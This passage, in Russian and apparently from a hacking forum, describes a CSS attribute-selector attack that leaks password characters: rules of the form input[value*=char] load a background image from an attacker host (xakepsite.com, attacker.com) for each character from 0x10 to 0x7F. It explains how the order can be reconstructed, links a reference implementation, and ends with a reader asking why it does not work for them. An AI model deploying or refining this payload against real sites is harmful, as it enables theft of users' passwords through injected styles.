input[value*=“\x10”]{

background:url(“//xakepsite.com/?h=\x10”);

}

… и так далее …

input[value*=“\x7F”]{

background:url(“//attacker.com/?h=\x7F”);

}

Что это дает? Каждый раз, когда символ пароля попадает в диапазон 10-7F, отсылается соответствующий запрос. Таким образом, по выходу у нас будут все символы пароля. Останется только расположить их в нужном порядке. В реальной жизни диапазон в 111 символов можно расширить, а с помощью асинхронных включений CSS восстановить и последовательность символов. Тут я останавливаться не буду, пример реализации - eaea.sirdarckcat.net/cssar.

кто-нибудь пользовался таким? у меня почемуто не работает....